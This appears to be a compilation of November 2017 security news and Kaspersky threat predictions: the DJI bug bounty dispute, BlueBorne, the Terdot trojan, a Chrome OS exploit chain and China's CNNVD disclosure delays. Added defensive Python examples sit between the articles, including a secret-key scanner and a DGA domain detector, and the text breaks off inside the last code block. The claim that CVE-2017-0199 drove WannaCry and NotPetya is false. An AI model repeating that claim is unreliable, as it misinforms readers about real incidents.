New underground market activity focused on attack services and hacking tools. In recent years, we have seen growing demand on the black market for zero day exploits targeting ICS. This tells us that criminals are working on targeted attack campaigns. We expect to see this interest increase in 2018, stimulating the growth of the black markets and the appearance of new segments focused on ICS configuration data and ICS credentials stolen from industrial companies and, possibly, offerings of botnets with ‘industrial’ nodes. Design and implementation of advanced cyberattacks targeting physical objects and systems requires expert knowledge of ICS and the relevant industries. Demand is expected to drive growth in areas such as ‘malware-as-a-service’, ‘attack-vector-design-as-a-service’, ‘attack-campaign-as-a-service’ and more.
New types of malware and malicious tools. We will probably see new malware being used to target industrial networks and assets, with features including stealth and the ability to remain inactive in the IT network to avoid detection, only activating in less secure OT infrastructure. Another possibility is the appearance of ransomware targeting lower-level ICS devices and physical assets (pumps, power switches, etc.).
Criminals will take advantage of ICS threat analyses published by security vendors. Researchers have done a good job finding and making public various attack vectors on industrial assets and infrastructures and analyzing the malicious toolsets found. However, this could also provide criminals with new opportunities. For example, the CrashOverride/Industroyer toolset disclosure could inspire hacktivists to run denial-of-service attacks on power and energy utilities; or criminals may target them with ransomware and may even invent monetizing schemes for blackouts. The PLC (programmable logic controller) worm concept could inspire criminals to create real-world malicious worms, while others could try to implement malware using one of the standard languages for programming PLCs. Criminals could also recreate the concept of infecting the PLC itself. Both these types of malware could remain undetected by existing security solutions.
Changes in national regulation. In 2018, a number of different cybersecurity regulations for industrial systems will need to be implemented. For example, those with critical infrastructures and industrial assets facilities will be compelled to do more security assessments. This will definitely increase protection and awareness. Thanks to that, we will probably see some new vulnerabilities found and threats disclosed.
Growing availability of, and investment in industrial cyber insurance. Industrial cyber-risk insurance is becoming an integral part of risk management for industrial enterprises. Previously, the risk of a cybersecurity incident was excluded from insurance contracts – just like the risk of a terrorist attack. But the situation is changing, with new initiatives introduced by both cybersecurity and insurance companies. In 2018, this will increase the number of audits/assessments and incident responses undertaken, raising cybersecurity awareness among the industrial facility’s leaders and operators.

Threat Predictions for Cryptocurrencies in 2018
17.11.2017 Kaspersky Analysis
The landscape in 2017
Today, cryptocurrency is no longer only for computer geeks and IT pros. It’s starting to affect people’s daily life more than they realize. At the same time, it is fast becoming an attractive target for cybercriminals. Some cyberthreats have been inherited from e-payments, such as changing the destination wallet address during transactions and stealing an electronic wallet, among other things. However, cryptocurrencies have opened up new and unprecedented ways to monetize malicious activity.

In 2017, the main global threat to users was ransomware: and in order to recover files and data encrypted by attackers, victims were required to pay a ransom in cryptocurrency. In the first eight months of 2017, Kaspersky Lab products protected 1.65 million users from malicious cryptocurrency miners, and by the end of the year we expect this number to exceed two million. In addition, in 2017, we saw the return of Bitcoin stealers after a few years in the shadows.

What can we expect in 2018?
With the ongoing rise in the number, adoption and market value of cryptocurrencies, they will not only remain an appealing target for cybercriminals, but will lead to the use of more advanced techniques and tools in order to create more. Cybercriminals will quickly turn their attention to the most profitable money-making schemes. Therefore, 2018 is likely to be the year of malicious web-miners.

Ransomware attacks will force users to buy cryptocurrency. Cybercriminals will continue to demand ransoms in cryptocurrency, because of the unregulated and almost anonymous cryptocurrency market: there is no need to share any data with anyone, no one will block the address, no one will catch you, and there is little chance of being tracked. At the same time, further simplification of the monetization process will lead to the wider dissemination of encryptors.
Targeted attacks with miners. We expect the development of targeted attacks on companies for the purpose of installing miners. While ransomware provides a potentially large but one-off income, miners result in a lower but longer-lasting one. Next year we will see what tips the scales.
Rise of miners will continue and involve new actors. Next year mining will continue to spread across the globe, attracting more people. The involvement of new miners will depend on their ability to get access to a free and stable source of electricity. Thus, we will see the rise of ‘insider miners’: more employees of government organizations will start mining on publicly owned computers, and more employees of manufacturing companies will start using company-owned facilities.
Web-mining. Web-mining is a cryptocurrency mining technique that runs directly in the browser via a special script embedded in a web page. Attackers have already proved it is easy to upload such a script to a compromised website and engage visitors’ computers in mining and, as a result, add more coins to the criminals’ wallets. Next year web-mining will dramatically affect the nature of the Internet, leading to new ways of website monetization. One of these will replace advertising: websites will offer to permanently remove a mining script if the user subscribes to paid content. Alternatively, different kinds of entertainment, such as movies, will be offered for free in exchange for your mining. Another method is based on website security checks: Captcha verification to distinguish humans from bots will be replaced with web-mining modules, and it will no longer matter whether a visitor is a bot or a human, since either will ‘pay’ with mining.
Fall of ICO (Initial Coin Offering). An ICO is crowdfunding via cryptocurrencies. 2017 saw tremendous growth in this approach, with more than $3 billion collected by different projects, most related in some way to blockchain. Next year we should expect the ICO hysteria to decline, with a series of failures (inability to deliver the ICO-funded product) and more careful selection of investment projects. A number of unsuccessful ICO projects may negatively affect the exchange rate of cryptocurrencies (Bitcoin, Ethereum etc.), which in 2017 experienced unprecedented growth. Thus we will see a decrease in the absolute number of phishing and hacking attacks targeting ICOs, smart contracts and wallets.

Drone Maker DJI, Researcher Quarrel Over Bug Bounty Program
17.11.2017 securityweek 
China-based Da-Jiang Innovations (DJI), one of the world’s largest drone makers, has accused a researcher of accessing sensitive information without authorization after the expert bashed the company’s bug bounty program.

DJI announced the launch of a bug bounty program in late August and offered between $100 and $30,000 for vulnerabilities that allow the creation of backdoors, and ones that expose sensitive customer information, source code or encryption keys.

Bug bounty hunters started analyzing the company’s systems for vulnerabilities, but didn’t know exactly where to look for them as DJI had failed to clarify exactly which of its assets were in scope.

Kevin Finisterre, a security researcher who specializes in drones, discovered that DJI had inadvertently made public SSL and firmware AES keys in source code published on GitHub. He also found keys for AWS buckets storing flight logs and customer identity documents, including passports, driver’s licenses, and state identification.
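The keys described above were sitting in source code pushed to a public repository. The following is an added Python example, not DJI's code nor the researcher's, of the kind of pre-commit secret scan that catches this class of leak on the defender's side: it looks for PEM private-key blocks, AWS access key IDs (the AKIA/ASIA prefix format that AWS documents; the sample uses the example ID from AWS's own documentation) and 128- or 256-bit hex values assigned to key-like variable names, using Shannon entropy to skip obvious placeholders. The sample source text and the variable names in it are constructed for the example.

```python
import math
import os
import re
from dataclasses import dataclass
from typing import List

# Constructed sample source text. The AWS access key ID is the example value
# from AWS's own documentation; the hex key is a made-up placeholder.
SAMPLE_SOURCE = """\
# config.py (constructed sample)
aws_access_key_id = "AKIAIOSFODNN7EXAMPLE"
FIRMWARE_AES_KEY = "00112233445566778899aabbccddeeff"
-----BEGIN RSA PRIVATE KEY-----
<constructed placeholder, no real key material>
-----END RSA PRIVATE KEY-----
version = "1.2.3"
"""

PATTERNS = {
    # PEM header of a private key committed as a file or string literal
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    # AWS access key IDs start with AKIA (long-term) or ASIA (temporary)
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    # 256- or 128-bit hex value assigned to a key/secret-looking name
    "hex_symmetric_key": re.compile(
        r"""(?i)\b\w*(?:key|secret|passwd|password)\w*\s*[:=]\s*["']?"""
        r"""([0-9a-f]{64}|[0-9a-f]{32})(?![0-9a-f])"""),
}


@dataclass
class Finding:
    kind: str
    line_no: int
    snippet: str      # redacted, safe to put in a report
    path: str = ""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; an all-zero placeholder scores 0."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(match_text: str) -> str:
    """Keep enough of the match to locate it, never the whole secret."""
    return match_text[:8] + "...[redacted]"


def scan_text(text: str, min_entropy: float = 3.0) -> List[Finding]:
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            m = pattern.search(line)
            if not m:
                continue
            # Skip obvious placeholders such as all zeros or repeated "deadbeef"
            if kind == "hex_symmetric_key" and shannon_entropy(m.group(1)) < min_entropy:
                continue
            findings.append(Finding(kind, line_no, redact(m.group(0))))
    return findings


def scan_tree(root: str, skip_dirs=(".git", "node_modules", "vendor")) -> List[Finding]:
    """Walk a checkout and scan every file as text; unreadable files are skipped."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            for f in scan_text(text):
                findings.append(Finding(f.kind, f.line_no, f.snippet, path))
    return findings


if __name__ == "__main__":
    for f in scan_text(SAMPLE_SOURCE):
        print(f"line {f.line_no}: {f.kind}: {f.snippet}")
```

Running `scan_tree` over a checkout in a pre-commit hook or CI job stops this class of leak before the push; the entropy threshold is what keeps documentation placeholders like `0000…` out of the report while a real firmware key still trips it.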

Finisterre said others had found unprotected AWS buckets storing, among other things, personal data and images of damaged drones submitted by customers.

“There were serious ramifications to the things that were found on the DJI AWS servers,” the researcher said. “One of the first things I did to judge the impact of the exposure was grep for ‘.mil’ and ‘.gov’, ‘gov.au’. Immediately flight logs for a number of potentially sensitive locations came out. It should be noted that newer logs, and PII seemed to be encrypted with a static OpenSSL password, so theoretically some of the data was at least loosely protected from prying eyes. Unfortunately the rest of the server side security renders this point moot.”


After reporting his findings to DJI via its bug bounty program, Finisterre was informed that he qualified for the maximum reward, $30,000. However, the company told him that in order to receive the bug bounty, he would have to sign an agreement.

“I won’t go into too much detail, but the agreement that was put in front of me by DJI in essence did not offer researchers any sort of protection,” Finisterre said. “For me personally the wording put my right to work at risk, and posed a direct conflict of interest to many things including my freedom of speech. It almost seemed like a joke. It was pretty clear the entire ‘Bug Bounty’ program was rushed based on this alone.”

While the researcher was trying to negotiate the non-disclosure agreement (NDA) via a DJI representative in the United States, the drone manufacturer’s legal department in China sent him a notice that he may be facing charges under the controversial Computer Fraud and Abuse Act (CFAA).

After consulting with lawyers who told him that DJI’s agreement was “extremely risky” and “likely crafted in bad faith to silence anyone that signed it,” the researcher decided to walk away from the bug bounty. He also decided to make his findings public, including some of the communications with DJI representatives during this process.

In response, DJI published a statement saying that it’s investigating Finisterre’s unauthorized access to its servers, and accused the researcher of publishing confidential communications with DJI employees.

“DJI implemented its Security Response Center to encourage independent security researchers to responsibly report potential vulnerabilities,” the company said in a statement. “DJI asks researchers to follow standard terms for bug bounty programs, which are designed to protect confidential data and allow time for analysis and resolution of a vulnerability before it is publicly disclosed. The hacker in question refused to agree to these terms, despite DJI’s continued attempts to negotiate with him, and threatened DJI if his terms were not met.”

The infosec community is split on this issue – some have taken Finisterre’s side pointing to DJI’s failure to specify exactly what its bug bounty covered and what researchers were allowed to do. Others, however, have sided with DJI, noting that the bounty hunter shouldn’t have accessed the data and that the agreement was reasonable.

Following Finisterre’s disclosure, DJI provided more information on its bug bounty program, including scope and requirements for disclosing flaws.

“DJI understands the importance of public disclosure of unknown or novel security flaws to build a common base of knowledge within the security community and to build a safer internet,” the company said. “DJI is committed to disclosing such information to the fullest extent possible. However, DJI in its sole discretion will decide when and how, and to what extent of details, to disclose to the public the bugs/vulnerabilities reported by you.”

DJI says it has paid out “thousands of dollars” to nearly a dozen researchers since the launch of its bug bounty program.

20 Million Google Home and Amazon Echo devices are affected by the Blueborne flaws
17.11.2017 securityaffairs

Millions of AI-based voice-activated personal assistants, including Google Home and Amazon Echo, are affected by the Blueborne flaws.
Millions of AI-based voice-activated personal assistants, including Google Home and Amazon Echo, are affected by the recently discovered Blueborne vulnerabilities.
The recently discovered BlueBorne attack technique was devised by experts with Armis Labs. Researchers discovered a total of eight vulnerabilities in the Bluetooth design that expose devices to cyber attacks.
Billions of mobile, desktop and IoT devices that use Bluetooth may be exposed to a new remote attack, even without any user interaction or pairing. The only condition for BlueBorne attacks is that targeted devices must have Bluetooth enabled.
Once an attacker compromises a Bluetooth-enabled device, he can infect any other device on the same network.

The IoT security firm Armis now reported that an estimated 15 million Amazon Echo and 5 million Google Home devices are vulnerable to BlueBorne attack.

“Following the disclosure of the BlueBorne attack vector this past September, Armis discovered that critical Bluetooth vulnerabilities impact the Amazon Echo and Google Home. These new IoT voice-activated Personal Assistants join the extensive list of affected devices.” reads the blog post published by Armis.

“Personal Assistants are rapidly expanding throughout the home and workplace, with an estimated 15 million Amazon Echo and 5 million Google Home devices sold. Since these devices are unmanaged and closed sourced, users are unaware of the fact their Bluetooth implementation is based on potentially vulnerable code borrowed from Linux and Android.”

The Amazon Echo devices are affected by the following two vulnerabilities:
Remote code execution vulnerability in the Linux Kernel (CVE-2017-1000251)
Information leak vulnerability in the SDP Server (CVE-2017-1000250)
The researchers highlighted that other Echo devices running Linux or Android operating systems are affected by other Blueborne vulnerabilities.

Google Home devices are affected only by the CVE-2017-0785 vulnerability that is an information disclosure flaw in Android’s Bluetooth stack.

Because the voice-activated personal assistants are constantly listening for Bluetooth communications, an attacker within range of the vulnerable IoT device can easily hack it.

“These devices are constantly listening to Bluetooth communications. There is no way to put an agent/antivirus on these devices. And given their limited UI, there is no way to turn their Bluetooth off” continues the blog post.

Experts from Armis published a video proof-of-concept (PoC) to show how to hack an Amazon Echo device.

Armis reported the issues to both Amazon and Google, which have released patches and issued automatic updates for the affected devices.

Amazon Echo users can check that their devices are using a version that is newer than v591448720.

“The Amazon Echo and Google Home are the better examples as they were patched, and did not need user interaction to update. However, the vast bulk of IoT devices cannot be updated. However, even the Echos and the Homes will eventually be replaced by new hardware versions (as Amazon and Google recently announced), and eventually the old generations will not receive updates – potentially leaving them susceptible to attacks indefinitely.” concluded Armis.

Terdot Banking Trojan is back and it now implements espionage capabilities
17.11.2017 securityaffairs

The Terdot banking Trojan isn’t a novelty in the threat landscape; it has been around since mid-2016, and now it is reappearing on the scene.
According to Bitdefender experts, vxers have improved the threat over the years, implementing credential harvesting features as well as social media account monitoring functionality.

The Terdot banking Trojan is based on the Zeus code that was leaked back in 2011; the authors have added a number of improvements, such as leveraging open-source tools for spoofing SSL certificates and using a proxy to filter web traffic in search of sensitive information.

“Terdot is a complex malware. Its modular structure, complex injections, and careful use of threads make it resilient, while its spyware and remote execution abilities make it extremely intrusive.” states the report published by BitDefender.

The ability of the Trojan in powering man-in-the-middle attacks could be exploited also to manipulate traffic on most social media and email platforms.

The Terdot banking Trojan implements sophisticated hooking and interception techniques, and experts highlighted its evasion capabilities.

The banking Trojan is distributed mainly through compromised websites hosting the SunDown Exploit Kit. The Bitdefender researchers also observed crooks spreading it through spam emails with a bogus PDF icon button which, if selected, executes JavaScript code that drops the malware on the victim’s machine.


Once installed on the victim’s machine, the Terdot banking Trojan downloads updates and commands from the C&C server, using the same URL to which it sends system information. The Trojan also uses a Domain Generation Algorithm (DGA).
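A DGA is what makes blocklisting the C&C URL futile, so the practical defence is to spot generated-looking domains in the resolver logs. The block below is an added Python example, not Bitdefender's detection logic and not Terdot's algorithm, of a simple DGA triage over DNS query logs: it scores the second-level label on entropy, vowel ratio, longest consonant run and digit count, and flags domains above a threshold. The log format, the scoring thresholds and the sample lines (reserved example.* names and two made-up generated-looking domains) are all constructed assumptions for the example.

```python
import math
import re
from typing import List, Tuple

# Constructed resolver log lines; format is an assumption for the example.
SAMPLE_DNS_LOG = """\
2017-11-17T10:02:11Z 10.0.0.5 query: www.example.com A
2017-11-17T10:02:12Z 10.0.0.5 query: mail.example.org A
2017-11-17T10:02:13Z 10.0.0.7 query: kxqzv7tpw2yblh9.com A
2017-11-17T10:02:14Z 10.0.0.7 query: qwjxzvtbpl.net A
2017-11-17T10:02:15Z 10.0.0.9 query: cdn.example.net AAAA
"""

QUERY_RE = re.compile(r"query:\s+(\S+)")
VOWELS = set("aeiou")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of the label."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def second_level_label(fqdn: str) -> str:
    """Naive SLD extraction: 'www.example.com' -> 'example'.
    (Public-suffix lists such as co.uk are deliberately not handled here.)"""
    labels = fqdn.rstrip(".").lower().split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def vowel_ratio(label: str) -> float:
    letters = [c for c in label if c.isalpha()]
    if not letters:
        return 0.0
    return sum(c in VOWELS for c in letters) / len(letters)


def longest_consonant_run(label: str) -> int:
    """Human-chosen names rarely string five or more consonants together."""
    best = run = 0
    for c in label:
        if c.isalpha() and c not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def dga_score(label: str) -> int:
    """Count how many generated-domain traits the label shows (0..4)."""
    score = 0
    if shannon_entropy(label) >= 3.5:
        score += 1
    if vowel_ratio(label) < 0.25:
        score += 1
    if longest_consonant_run(label) >= 5:
        score += 1
    if sum(c.isdigit() for c in label) >= 2:
        score += 1
    return score


def triage(log_text: str, threshold: int = 2) -> List[Tuple[str, int]]:
    """Return (fqdn, score) for each distinct queried name at or above threshold."""
    flagged = []
    seen = set()
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        fqdn = m.group(1).lower()
        if fqdn in seen:
            continue
        seen.add(fqdn)
        score = dga_score(second_level_label(fqdn))
        if score >= threshold:
            flagged.append((fqdn, score))
    return flagged


if __name__ == "__main__":
    for fqdn, score in triage(SAMPLE_DNS_LOG):
        print(f"suspicious: {fqdn} (score {score})")
```

Heuristics like these produce false positives on CDN hostnames and short brand names, so the output is a hunting lead to be joined with the rest of the host's behaviour (NXDOMAIN bursts, newly registered domains, beaconing intervals), not a blocking rule on its own.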

“Terdot goes above and beyond the capabilities of a banker Trojan. Its focus on harvesting credentials for other services such as social networks and email service providers could turn it into an extremely powerful cyber-espionage tool that is extremely difficult to spot and clean,” Bitdefender concludes.

Google Discloses Details of $100,000 Chrome OS Flaws
17.11.2017 securityweek

Google has made public the details of a code execution exploit chain for Chrome OS that has earned a researcher $100,000.

In March 2015, Google announced its intention to offer up to $100,000 for an exploit chain that would lead to a persistent compromise of a Chromebox or Chromebook in guest mode via a web page. Prior to that, the company had offered $50,000 for such an exploit.

A researcher who uses the online moniker Gzob Qq informed Google on September 18 that he had identified a series of vulnerabilities that could lead to persistent code execution on Chrome OS, the operating system running on Chromebox and Chromebook devices.

The exploit chain includes an out-of-bounds memory access flaw in the V8 JavaScript engine (CVE-2017-15401), a privilege escalation in PageState (CVE-2017-15402), a command injection flaw in the network_diag component (CVE-2017-15403), and symlink traversal issues in crash_reporter (CVE-2017-15404) and cryptohomed (CVE-2017-15405).
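Two of the five bugs in the chain are symlink traversal issues in privileged daemons, where a link planted in a writable directory redirects a root-owned open to a file the attacker chose. The block below is an added Python example, not Chrome OS code and not the researcher's exploit, of the defensive pattern that closes this class: open every path component with O_NOFOLLOW relative to the previous directory descriptor (openat semantics) and reject absolute paths and `..` up front. The `demo()` function builds a constructed report directory with planted links and shows the naive `open()` following one while `open_within` refuses; directory names and file contents are constructed for the example.

```python
import errno
import os
import shutil
import tempfile
from typing import Dict


class UnsafePathError(Exception):
    """The requested path would leave the base directory or cross a symlink."""


def _open_nofollow(name: str, flags: int, dir_fd: int) -> int:
    try:
        return os.open(name, flags, dir_fd=dir_fd)
    except OSError as exc:
        # ELOOP: the component is a symlink and O_NOFOLLOW refused it.
        # ENOTDIR: a plain file sits where a directory component was expected.
        if exc.errno in (errno.ELOOP, errno.EMLINK, errno.ENOTDIR):
            raise UnsafePathError(f"refusing {name!r}: {exc.strerror}") from exc
        raise


def open_within(base_dir: str, rel_path: str, flags: int = os.O_RDONLY) -> int:
    """Open base_dir/rel_path without ever following a symlink.

    Every component is opened with O_NOFOLLOW relative to the previous
    directory descriptor, so a link planted at any depth cannot redirect the
    open outside base_dir, and there is no check-then-open window in which
    the path could be swapped. Absolute paths and '..' are rejected before
    the filesystem is touched. Returns a file descriptor.
    """
    if os.path.isabs(rel_path):
        raise UnsafePathError("absolute paths are not allowed")
    parts = [p for p in rel_path.split("/") if p not in ("", ".")]
    if not parts or os.pardir in parts:
        raise UnsafePathError(f"traversal component in {rel_path!r}")

    dir_flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW | os.O_CLOEXEC
    fd = os.open(os.path.realpath(base_dir), dir_flags)
    try:
        for comp in parts[:-1]:
            next_fd = _open_nofollow(comp, dir_flags, fd)
            os.close(fd)
            fd = next_fd
        return _open_nofollow(parts[-1], flags | os.O_NOFOLLOW | os.O_CLOEXEC, fd)
    finally:
        os.close(fd)


def demo() -> Dict[str, str]:
    """Constructed layout: a report directory with a planted file link and a
    planted directory link; compare naive open() with open_within()."""
    base = tempfile.mkdtemp(prefix="crash_reports_")
    outside = tempfile.mkdtemp(prefix="outside_")
    results = {}
    try:
        secret = os.path.join(outside, "secret.txt")
        with open(secret, "w") as fh:
            fh.write("outside data")
        os.mkdir(os.path.join(base, "reports"))
        with open(os.path.join(base, "reports", "ok.txt"), "w") as fh:
            fh.write("crash report")
        # Planted links, the situation a symlink traversal bug relies on
        os.symlink(secret, os.path.join(base, "reports", "planted.txt"))
        os.symlink(outside, os.path.join(base, "linkdir"))

        with open(os.path.join(base, "reports", "planted.txt")) as fh:
            results["naive_open"] = fh.read()          # follows the link

        with os.fdopen(open_within(base, "reports/ok.txt")) as fh:
            results["regular"] = fh.read()

        attempts = {
            "file_symlink": "reports/planted.txt",
            "dir_symlink": "linkdir/secret.txt",
            "dotdot": "../outside/secret.txt",
            "absolute": secret,
        }
        for label, rel in attempts.items():
            try:
                os.close(open_within(base, rel))
                results[label] = "opened"
            except UnsafePathError:
                results[label] = "blocked"
    finally:
        shutil.rmtree(base)
        shutil.rmtree(outside)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The same idea applies to a daemon that writes: pass `os.O_WRONLY | os.O_CREAT | os.O_EXCL` as `flags` so an attacker cannot pre-create the target either, and keep the directory descriptor open for the lifetime of the operation rather than re-resolving the path.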

Gzob Qq provided Google a proof-of-concept (PoC) exploit tested with Chrome 60 and Chrome OS platform version 9592.94.0. Google patched the vulnerabilities on October 27 with the release of Chrome OS 62 platform version 9901.54.0/1, which also addressed the recently disclosed KRACK vulnerabilities.

Google informed the researcher on October 11 that he had earned the $100,000 Pwnium reward. Pwnium was a single-day hacking competition that Google held every year alongside the CanSecWest conference until February 2015, when it decided to turn Pwnium into a year-round program.

Gzob Qq’s initial report, which describes the entire exploit chain, was made public by Google earlier this week, along with the advisories for each of the vulnerabilities it leverages.

This is not the first time the researcher has earned a $100,000 reward from Google. Roughly one year prior, he reported a similar Chrome OS exploit chain for which he received the same amount.

Back in 2014, at the Pwnium competition, researcher George Hotz earned $150,000 for a persistent Chrome OS exploit.

China May Delay Vulnerability Disclosures For Use in Attacks
17.11.2017 securityweek
The NSA and CIA exploit leaks have thrown the spotlight on US government stockpiles of 0-day exploits -- and possibly led to this week's government declassification of the Vulnerabilities Equities Policy (VEP) process used to decide whether to disclose or retain the exploits it discovers.

There is no doubt that other nations also hold stockpiles of exploits; but there has been little public information on this. While not being a stockpile per se, Recorded Future has today published research suggesting that China delays disclosure of known critical vulnerabilities, sometimes to enable their immediate use by APT groups with probable Chinese government affiliation.

Today's publication has spun out of earlier research demonstrating that China's national vulnerability database (CNNVD) -- which is run by the Chinese Ministry of State Security (MSS) -- is generally faster at publishing vulnerability details than its U.S. equivalent, the NVD. In a few cases, however, it is considerably slower. These 'outliers' have now been analyzed by Recorded Future with surprising results.

The research takes a close look at two particular vulnerabilities that were, unusually, published by the U.S. NVD much sooner than by China's CNNVD. The first is CVE-2017-0199 -- the exploit used in the WannaCry and NotPetya outbreaks. Details were published by the NVD on April 12, 2017; but were not published by CNNVD until more than 50 days later (June 7, 2017). The WannaCry outbreak, generally attributed to North Korean hackers, occurred between these two dates.

However, the researchers also point to Proofpoint's analysis of Chinese threat actors known as TA459 using the same vulnerability in the same timeframe against military and aerospace organizations in Russia and Belarus. "It is likely," suggests Recorded Future, "that the publication lag for CVE-2017-0199 could have been affected by the MSS which wanted to buy time for the vulnerability to be exploited in its operations or on behalf of another Chinese state-sponsored actor."

The second 'outlier' analyzed by the researchers concerns CVE-2016-10136 and CVE-2016-10138, two vulnerabilities in Android software developed by a company named Shanghai Adups Technology. Kryptowire researchers reported in November 2016 that these vulnerabilities amount to a backdoor in certain Android phones resulting in the transmission of text messages, contact lists, call logs, location information, and other data to a Chinese server.

Details were published by NVD in January 2017, two months after the vulnerability became public knowledge. CNNVD took another eight months before publishing a much less detailed description of the vulnerability. "The systems with these backdoors were overwhelmingly located in China, CNNVD is largely followed and consumed by Chinese businesses and citizens, and the MSS has a mission to collect domestic intelligence. While we cannot determine with certainty that the MSS was exploiting this vulnerability, we believe this is another example of likely MSS interference in the CNNVD publication process."

In total, the researchers analyzed nearly 300 different CVEs that fell outside of the statistical norm for vulnerability reporting in China. "What we discovered," they say, "were numerous clear examples of unexplainable behavior in vulnerability reporting by CNNVD, and cases where we believe the MSS likely have interfered to delay publication."

This is not stockpiling 0-day exploits in the way the NSA and the CIA have stockpiled them, but it is an indication that China sometimes delays publication of details either while it is already using the exploits, or possibly to allow for their rapid use.

"Our analysis of these critical statistical deviations highlights why an intelligence service should not manage the vulnerability publication process -- it is impossible for an intelligence service to equally uphold the mandates for both vulnerability reporting (transparency) and intelligence operations (secrecy). Our analysis of this dataset demonstrates that in China, one mandate is typically sacrificed -- that of transparency."

This is in sharp contrast to the separation of vulnerability reporting away from the intelligence agencies in the U.S.; and the U.S. attempt this week to increase the transparency over its approach towards vulnerabilities.

Kaspersky Security Bulletin: Threat Predictions for 2018

16.11.2017 Kaspersky Analysis
Advanced Persistent Threats in 2018
By Juan Andrés Guerrero-Saade, Costin Raiu, Kurt Baumgartner on November 15, 2017. 10:01 am

As hard as it is to believe, it’s once again time for our APT Predictions. Looking back at a year like 2017 brings the internal conflict of being a security researcher into full view: on the one hand, each new event is an exciting new research avenue for us, as what were once theoretical problems find palpable expression in reality. This allows us to understand the actual attack surface and attacker tactics and to further hone our hunting and detection to address new attacks. On the other hand, as people with a heightened concern for the security posture of users at large, each event is a bigger catastrophe. Rather than consider each new breach as yet another example of the same, we see the compounding cumulative insecurity facing users, e-commerce, financial, and governmental institutions alike.

As we stated last year, rather than thinly-veiled vendor pitching, our predictions are an attempt to bring to bear our research throughout the year in the form of trends likely to peak in the coming year.

Our record – did we get it right?
As a snapshot scorecard of our performance last year, these are some of our 2017 predictions and some examples where relevant:

Espionage and APTs:

Passive implants showing almost no signs of infection come into fashion
Yes – https://securelist.com/unraveling-the-lamberts-toolkit/77990/
Ephemeral infections / memory malware
Yes – https://securelist.com/fileless-attacks-against-enterprise-networks/77403/
Espionage goes mobile
Yes – https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html
Financial Attacks:

The future of financial attacks
Yes – https://securelist.com/lazarus-under-the-hood/77908/
Dirty, lying ransomware
Yes – https://securelist.com/schroedingers-petya/78870/
Industrial threats:

The ICS Armageddon didn’t come yet (and we are happy to be wrong on that), however, we’ve seen ICS come under attack from Industroyer – https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/
A brick by any other name
Yes! BrickerBot – https://arstechnica.com/information-technology/2017/04/brickerbot-the-permanent-denial-of-service-botnet-is-back-with-a-vengeance/
Information Warfare:

Yes, multiple examples – https://citizenlab.ca/2017/05/tainted-leaks-disinformation-phish/
What can we expect in 2018?
More supply chain attacks. Kaspersky Lab’s Global Research and Analysis Team tracks over 100 APT (advanced persistent threat) groups and operations. Some of these are incredibly sophisticated and possess wide arsenals that include zero-day exploits, fileless attack tools, and combine traditional hacking attacks with handovers to more sophisticated teams that handle the exfiltration part. We have often seen cases in which advanced threat actors have attempted to breach a certain target over a long period of time and kept failing at it. This was either due to the fact that the target was using strong internet security suites, had educated their employees not to fall victim to social engineering, or consciously followed the Australian DSD TOP35 mitigation strategies for APT attacks. In general, an actor that is considered both advanced and persistent won’t give up that easily, they’ll continue poking the defenses until they find a way in.
When everything else fails, they are likely to take a step back and re-evaluate the situation. During such a re-evaluation, threat actors can decide a supply chain attack can be more effective than trying to break into their target directly. Even a target whose networks employ the world’s best defenses is likely using software from a third-party. The third party might be an easier target and can be leveraged to attack the better protected original target enterprise.

During 2017, we have seen several such cases, including but not limited to:

ExPetr / NotPetya
These attacks can be extremely difficult to identify or mitigate. For instance, in the case of Shadowpad, the attackers succeeded in Trojanizing a number of packages from Netsarang that were widely used around the world, in banks, large enterprises, and other industry verticals. The difference between the clean and Trojanized packages can be dauntingly difficult to notice – in many cases it’s the command and control (C&C) traffic that gives them away.

For CCleaner, it was estimated that over 2 million computers received the infected update, making it one of the biggest attacks of 2017. Analysis of the malicious CCleaner code allowed us to correlate it with a couple of other backdoors that are known to have been used in the past by APT groups from the ‘Axiom umbrella’, such as APT17 also known as Aurora. This proves the now extended lengths to which APT groups are willing to go in order to accomplish their objectives.

Our assessment is that the number of supply chain attacks at the moment is probably much higher than we realize, but these have yet to be noticed or exposed. During 2018, we expect to see more supply chain attacks, both in terms of discovery and of actual attacks. Trojanizing specialized software used in specific regions and verticals will become a move akin to waterholing strategically chosen sites in order to reach specific swaths of victims, and will thus prove irresistible to certain types of attackers.
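One control a defender can put in front of an installer is a file-level integrity check against a reference manifest, which turns "dauntingly difficult to notice" into a listed diff: a patched binary shows up as modified and a dropped loader as an unexpected file. The block below is an added Python example, not Kaspersky's tooling and not any vendor's updater, that parses a sha256sum-style manifest, verifies a tree against it and reports modified, missing and unexpected files. The package layout, file contents and the simulated Trojanized update are constructed for the example.

```python
import hashlib
import hmac
import os
import shutil
import tempfile
from typing import Dict, List, Tuple


def sha256_file(path: str, chunk_size: int = 65536) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def parse_manifest(text: str) -> Dict[str, str]:
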